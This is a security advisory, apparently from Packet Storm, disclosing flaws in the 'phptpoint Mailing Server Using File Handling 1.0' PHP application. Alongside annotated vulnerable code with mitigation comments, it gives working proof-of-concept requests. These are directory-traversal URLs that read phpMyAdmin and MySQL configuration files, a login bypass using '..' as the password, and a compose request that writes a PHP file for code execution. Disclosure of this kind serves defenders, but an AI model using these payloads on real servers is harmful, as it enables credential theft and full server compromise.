PHPTPoint Mailing Server Using File Handling 1.0 Arbitrary File Read

2018-10-26T00:00:00
ID PACKETSTORM:149965
Type packetstorm
Reporter Boumediene Kaddour
Modified 2018-10-26T00:00:00

Description

                                        
# Exploit Title: phptpoint Mailing Server Using File Handling 1.0 - Arbitrary File Read  
# Date: 2018-10-25  
# Exploit Author: Boumediene KADDOUR  
# Unit: Algerie Telecom R&D Unit  
# Vendor Homepage: https://www.phptpoint.com/  
# Software Link: https://www.phptpoint.com/projects/ignou-mca-projects/  
# Version: 1.0  
# Tested on: WAMP windows 10 x64  
# CVE: unknown  
  
# Description :  
# phptpoint Mailing Server Using File Handling 1.0 suffers from multiple  
Arbitrary File Read vulnerabilities in different sections that allow an  
attacker to read sensitive files on the system, and also allow the login  
page to be bypassed.  
  
# Vulnerable Code: home.php  
  
125 //for inbox  
// Reads one message file from the current user's inbox directory and echoes  
// it verbatim. $user is defined outside this excerpt (likely populated from  
// $_SESSION['user'] as set in login.php — confirm).  
126 $coninb=$_GET['coninb'];  
// The query parameter is read before the isset() check, so a request without  
// ?coninb= raises an undefined-index notice/warning instead of being skipped.  
127 if(isset($coninb))  
128 {  
// The untrusted query value is interpolated into the path with no  
// normalisation, so "../" sequences escape User_Data/$user/inbox/ — the  
// arbitrary file read reported by this advisory. Mitigation: reduce the value  
// with basename(), or realpath() the result and require that it remains under  
// the inbox directory, before any filesystem call.  
129 $fo=fopen("User_Data/$user/inbox/$coninb","r");  
// fopen() and filesize() return false on failure; neither result is checked,  
// and the handle is never fclose()d.  
130 $filesize=filesize("User_Data/$user/inbox/$coninb");  
131 $msg=fread($fo,$filesize);  
// Content is emitted without output escaping, so it is rendered as HTML.  
132 echo $msg;  
133 }  
  
# PoC:  
view-source:  
http://127.0.0.1/Mailserver_filesystem/home.php?coninb=../../../../../../wamp64/apps/phpmyadmin4.8.3/config.inc.php  
http://127.0.0.1/Mailserver_filesystem/home.php?coninb=../../../../../../wamp64/bin/mysql/mysql5.7.23/my.ini  
  
  
134 //for sent  
// Same pattern as the inbox branch above, for the sent/ directory: read a  
// message file named by the query string and echo it verbatim. $user comes  
// from outside this excerpt (likely the session set in login.php — confirm).  
135 $consent=$_GET['consent'];  
// Read before the isset() check, so a missing ?consent= parameter produces an  
// undefined-index notice/warning.  
136 if(isset($consent))  
137 {  
// No path normalisation: "../" in the value escapes User_Data/$user/sent/.  
// Mitigation: basename() the value, or realpath() and verify containment  
// under the sent directory, before opening anything.  
138 $fo=fopen("User_Data/$user/sent/$consent","r");  
// fopen()/filesize() failures (false) are not handled; handle never closed.  
139 $filesize=filesize("User_Data/$user/sent/$consent");  
140 $msg=fread($fo,$filesize);  
// Emitted without output escaping.  
141 echo $msg;  
142 }  
# PoC:  
view-source:  
http://127.0.0.1/Mailserver_filesystem/home.php?consent=../../../../../../wamp64/apps/phpmyadmin4.8.3/config.inc.php  
http://127.0.0.1/Mailserver_filesystem/home.php?consent=../../../../../../wamp64/bin/mysql/mysql5.7.23/my.ini  
143 //for trash  
// Same pattern for the trash/ directory. Note the query key is "contrs"  
// (no trailing "h"), unlike the local variable name. $user is defined outside  
// this excerpt (likely the session value set in login.php — confirm).  
144 $contrsh=$_GET['contrs'];  
// Read before the isset() check, so a missing parameter produces an  
// undefined-index notice/warning.  
145 if(isset($contrsh))  
146 {  
// No path normalisation: "../" in the value escapes User_Data/$user/trash/.  
// Mitigation: basename() the value, or realpath() and verify containment  
// under the trash directory, before opening anything.  
147 $fo=fopen("User_Data/$user/trash/$contrsh","r");  
// fopen()/filesize() failures (false) are not handled; handle never closed.  
148 $filesize=filesize("User_Data/$user/trash/$contrsh");  
149 $msg=fread($fo,$filesize);  
// Emitted without output escaping.  
150 echo $msg;  
151 }  
  
# PoC:  
view-source:  
http://127.0.0.1/Mailserver_filesystem/home.php?contrs=../../../../../../wamp64/apps/phpmyadmin4.8.3/config.inc.php  
http://127.0.0.1/Mailserver_filesystem/home.php?contrh=../../../../../../wamp64/bin/mysql/mysql5.7.23/my.ini  
  
152 //for trash  
// Despite the comment above, this branch serves the draft/ directory (the  
// parameter and path both say draft). $user is defined outside this excerpt  
// (likely the session value set in login.php — confirm).  
153 $condrft=$_GET['condrft'];  
// Read before the isset() check, so a missing ?condrft= parameter produces an  
// undefined-index notice/warning.  
154 if(isset($condrft))  
155 {  
// No path normalisation: "../" in the value escapes User_Data/$user/draft/.  
// Mitigation: basename() the value, or realpath() and verify containment  
// under the draft directory, before opening anything.  
156 $fo=fopen("User_Data/$user/draft/$condrft","r");  
// fopen()/filesize() failures (false) are not handled; handle never closed.  
157 $filesize=filesize("User_Data/$user/draft/$condrft");  
158 $msg=fread($fo,$filesize);  
// Emitted without output escaping.  
159 echo $msg;  
160 }  
  
# PoC:  
view-source:  
http://127.0.0.1/Mailserver_filesystem/home.php?condrft=../../../../../../wamp64/apps/phpmyadmin4.8.3/config.inc.php  
http://127.0.0.1/Mailserver_filesystem/home.php?condrft=../../../../../../wamp64/bin/mysql/mysql5.7.23/my.ini  
  
161 //for spam  
// Intended for the spam folder, but both filesystem calls below use the  
// draft/ directory — probably a copy-paste slip; confirm the intended path.  
// $user is defined outside this excerpt (likely the session value set in  
// login.php — confirm).  
162 $conspam=$_GET['conspam'];  
// Read before the isset() check, so a missing ?conspam= parameter produces an  
// undefined-index notice/warning.  
163 if(isset($conspam))  
164 {  
// No path normalisation: "../" in the value escapes User_Data/$user/draft/.  
// Mitigation: basename() the value, or realpath() and verify containment  
// under the intended folder, before opening anything.  
165 $fo=fopen("User_Data/$user/draft/$conspam","r");  
// fopen()/filesize() failures (false) are not handled; handle never closed.  
166 $filesize=filesize("User_Data/$user/draft/$conspam");  
167 $msg=fread($fo,$filesize);  
// Emitted without output escaping.  
168 echo $msg;  
169 }  
# PoC:  
view-source:  
http://127.0.0.1/Mailserver_filesystem/home.php?conspam=../../../../../../wamp64/apps/phpmyadmin4.8.3/config.inc.php  
http://127.0.0.1/Mailserver_filesystem/home.php?conspam=../../../../../../wamp64/bin/mysql/mysql5.7.23/my.ini  
  
  
  
# Bypass Login page.  
Since "." and ".." are treated as directory entries by the operating system,  
we can pass any valid username together with any existing directory or file  
on the system, and it will be accepted as a valid password.  
Vulnerable Code: login.php  
  
6 if(isset($_POST['l']))  
7 {  
8 $email=$_POST['e'];  
9 $pass=$_POST['p'];  
10 if(file_exists("User_Data/$email") &&  
file_exists("User_Data/$email/$pass"))  
11 {  
12 $_SESSION['user']=$email;  
13 //header('location:home.php');  
14 echo "<script>window.location='home.php'</script>";  
15 }  
16 else  
17 {  
18 echo "<h1 align='center'><font color='green' face='cursive'>Invalid  
User</font></h1>";  
19 }  
  
  
# PoC:  
  
POST /Mailserver_filesystem/index.php?option=login HTTP/1.1  
Host: 172.16.122.4  
Content-Length: 328  
Cache-Control: max-age=0  
Origin: http://172.16.122.4  
Upgrade-Insecure-Requests: 1  
Content-Type: multipart/form-data;  
boundary=----WebKitFormBoundaryj3oDIRYA36Vt2dpb  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36  
(KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36  
Accept:  
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8  
Referer: http://172.16.122.4/Mailserver_filesystem/index.php?option=login  
Accept-Encoding: gzip, deflate  
Accept-Language: en-US,en;q=0.9,fr;q=0.8,fr-FR;q=0.7  
Cookie: resolve_ids=0; order_dir_list_by=1A;  
PHPSESSIDwebERPteam=aaktuhmrlihn8c8v5pvscj62j5;  
PHPSESSID=usnk2tfmjjp74ffpuqbfh9hvn1  
Connection: close  
  
------WebKitFormBoundaryj3oDIRYA36Vt2dpb  
Content-Disposition: form-data; name="e"  
  
hacker@ps.com  
------WebKitFormBoundaryj3oDIRYA36Vt2dpb  
Content-Disposition: form-data; name="p"  
  
..  
------WebKitFormBoundaryj3oDIRYA36Vt2dpb  
Content-Disposition: form-data; name="l"  
  
Login  
------WebKitFormBoundaryj3oDIRYA36Vt2dpb--  
  
  
# Arbitrary File upload to code execution  
  
  
http://172.16.122.4/Mailserver_filesystem/User_Data/hacker@ps.com/inbox/abc@ps.com%20.php  
  
POST /Mailserver_filesystem/home.php?option=compose HTTP/1.1  
Host: 172.16.122.4  
Content-Length: 75  
Cache-Control: max-age=0  
Origin: http://172.16.122.4  
Upgrade-Insecure-Requests: 1  
Content-Type: application/x-www-form-urlencoded  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36  
(KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36  
Accept:  
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8  
Referer: http://172.16.122.4/Mailserver_filesystem/home.php?option=compose  
Accept-Encoding: gzip, deflate  
Accept-Language: en-US,en;q=0.9,fr;q=0.8,fr-FR;q=0.7  
Cookie: resolve_ids=0; order_dir_list_by=1A;  
PHPSESSIDwebERPteam=aaktuhmrlihn8c8v5pvscj62j5;  
PHPSESSID=usnk2tfmjjp74ffpuqbfh9hvn1  
Connection: close  
  
to=hacker@ps.com&sub=.php&msg=<?php phpinfo(); ?>&send=Send  
  
  
# You can access the php file via this link.  
  
http://yourIP/Mailserver_filesystem/User_Data/hacker@ps.com/inbox/hacker@ps.com.php  